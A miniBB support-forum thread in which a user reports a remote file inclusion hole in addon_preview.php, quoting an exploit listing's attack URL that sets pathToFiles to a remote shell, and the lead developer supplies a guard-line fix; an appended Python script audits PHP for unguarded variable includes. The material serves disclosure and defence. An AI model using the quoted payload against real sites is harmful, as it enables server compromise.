miniBB Support Forums | 18 years on The Web

miniBB 3.x Addon preview Remote File Include Vulnerability

Author Dransil
#1 | Posted: 17 Mar 2014 02:11 
I'm not looking to stir any trouble, but I often search for exploits/vulns concerning the software that I personally use/run, and I came across this today on an exploits-for-sale website. This particular exploit is being offered for free currently:
Found vulnerable code in file addon_preview.php line: 12
So an attacker can use it to compromise the system.
Not declared before &require parameter is: $pathToFiles
h t t p : / / [target]/[dir]/addon_preview.php?pathToFiles=[SHELL]

Author Paul
Lead Developer
#2 | Posted: 18 Mar 2014 22:25 | Edited by: Paul 
Thanks for this.

The only fix to provide is to put this line on top of execution of addon_preview.php:

if (!defined('INCLUDED776')) die ('Fatal error.');

Possibly this was out from the very ancient times, and the exploit actually will work only if PHP's setting register_globals is set to ON, which nowadays, obviously, is met truly rarely on hostings. Also, it would work only on miniBB installations which would have the Preview add-on installed.

I've updated the official package regarding this fix. Thanks again.
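
A defensive check for the pattern discussed in this thread, as an added example (not miniBB code and not written by either poster): a small Python auditor that flags PHP source where include/require takes a path starting with a variable that was never assigned earlier in the same file and no direct-access guard of the kind shown in the fix precedes it. The function name audit_php and the PHP samples are constructed for illustration.

```python
import re

# include/require (optionally _once) whose path starts with a PHP variable
INCLUDE_VAR = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)', re.I)
# Direct-access guard in the shape of the fix: if (!defined('X')) die/exit
GUARD = re.compile(
    r'if\s*\(\s*!\s*defined\s*\(\s*[\'"]\w+[\'"]\s*\)\s*\)\s*(?:die|exit)\b', re.I)
# Plain assignment "$name =" (not ==, === or =>)
ASSIGN = re.compile(r'\$(\w+)\s*=(?![=>])')


def audit_php(source):
    """Return [(line_no, variable)] for include/require statements that use
    a variable not assigned earlier in the file and not behind a guard."""
    findings, assigned, guarded = [], set(), False
    for no, line in enumerate(source.splitlines(), 1):
        if GUARD.search(line):
            guarded = True  # every later line is unreachable on direct access
        for m in INCLUDE_VAR.finditer(line):
            # assignments that appear earlier on the same line also count
            earlier = {a.group(1) for a in ASSIGN.finditer(line[:m.start()])}
            if not guarded and m.group(1) not in assigned | earlier:
                findings.append((no, m.group(1)))
        assigned.update(a.group(1) for a in ASSIGN.finditer(line))
    return findings


# Constructed samples; none of this is the real addon_preview.php.
UNGUARDED = """<?php
$title = 'Preview';
require($pathToFiles . 'lang/eng.php');
"""
GUARDED = """<?php
if (!defined('INCLUDED776')) die ('Fatal error.');
require($pathToFiles . 'lang/eng.php');
"""
LOCAL_PATH = """<?php
$tpl = __DIR__ . '/templates/';
include $tpl . 'head.php';
"""

if __name__ == "__main__":
    for name, src in (("unguarded", UNGUARDED), ("guarded", GUARDED),
                      ("local path", LOCAL_PATH)):
        print(name, audit_php(src))
```

This is a line-based heuristic: it does not parse PHP comments or multi-line statements, so treat a finding as a prompt to review the file rather than as proof of a flaw.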
